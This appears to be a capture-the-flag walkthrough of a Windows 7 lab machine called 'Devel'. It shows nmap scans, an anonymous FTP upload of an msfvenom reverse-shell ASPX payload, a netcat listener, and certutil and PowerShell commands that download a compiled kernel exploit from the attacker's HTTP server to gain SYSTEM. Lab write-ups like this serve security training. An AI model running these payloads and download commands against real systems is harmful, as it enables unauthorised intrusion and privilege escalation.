Devel
Devel
Reconnaissance
Running Quick initial Nmap Scan
sudo nmap -sC -sV -O -oN nmap/initial 10.10.10.5-sC : Scan with nmap’s default script -sV : Service detection -O : OS detection
Running the full scan
To make sure we’ve covered all the ports.
sudo nmap -sC -sV -O -p- -oN nmap/full 10.10.10.5-p- : scan all the ports
We’ve got the same Result
Running udp scan
sudo nmap -sU -O -oN nmap/udp 10.10.10.5-sU : udp scan
Nothing found.
Attack vectors
Enumeration
Let’s have a peak in port 80, which is default webpage
Now have look in ftp. As it allowed anonymous login we can easily log in by these default creds
user : anonymous
pass :
If you try accessing these file from web you can do that. May be the FTP server is in the same root as the HTTP server. lets test it,
upload a file via ftp
access that file in the web
FTP commands:
put filename : will upload local file to target ftp server
ls : show the directory
Accessing the file in web.
we can access. So we also can execute arbitrary payload by uploading via ftp.
Gaining Foothold
Making a reverse shell via msfvenom
msfvenom -p windows/reverse_tcp LHOST=10.10.16.70 LPORT=9999 -f aspx -o payload.aspx-p : payload type.
-LHOST : my local host where the server will contact
-LPORT : the port on which it will connect
-f : payload type. as our target server is windows we used
aspxextension-o : output location and file name
Uploading the payload.aspx
Starting a listener on port 9999
nc -lnvp 9999Executing the payload by accessing that file in the web
And we get the shell.
Okay, First thing first lets try to access the user flag .
cd c:\users
Trying to access babis
cd babis
permission denied …
Administrator is also the same
Let's have basic enumeration throughout the machine.
systeminfo :
It's windows 7 enterprise
Build 7600 ( quite old , should have vulnerabilities)
Its running on
32 bitAnd no
hotfixavailable.
Turning on Hackers Mind:
So let's search for exploit
And yeah it has an exploit. Let's follow the first link. It's a kernel exploit .
It's exploit db. To copy the exploit we just need the EBD-ID
It has instructions too , it will be a great help.
Before doing that you should update your local searchsploit database
searchsploit -u
Search for the payload using searchsploit
searchsploit 40564
Copying/mirroring the payload in current folder
searchsploit -m 40564
Now, read the payloads and its usage.
According to the instructions we need to compile the payload first according to the machine we are attacking.
We are attacking the 32 bit machine.
To download the compiler use the following commnd
sudo apt-get install gcc-mingw-w64Now compile the payload 40564.c to exploit.exe by using following command.
Payload delivery
First Run an http server in our attacker machine. Which will create a server and will make our current directory accessible from internet. And our current directory will contain the payload.
python3 -m http.server 13371337 is our port in which our server is running.
Now find our local ip.
ipconfig tun0 should be our local ip
Process 1: via powershell
powershell -c "(new-object System.Net.WebClient).DownloadFile('[http://10.10.16.70:1337/exploit.exe](http://10.10.16.70:1337/exploit.exe)', 'c:\Users\Public\Downloads\exploit.exe')"
or
Process 2: Via certutil. It's the most convenient way
certutil.exe -urlcache -split -f http://10.10.16.70:1337/exploit.exe
Sending payload to the victim machine is successful.
Now negative to that specific folder where the payload is uploaded. And simply run the exploit.
And that's it. We Became root .
Last updated
Was this helpful?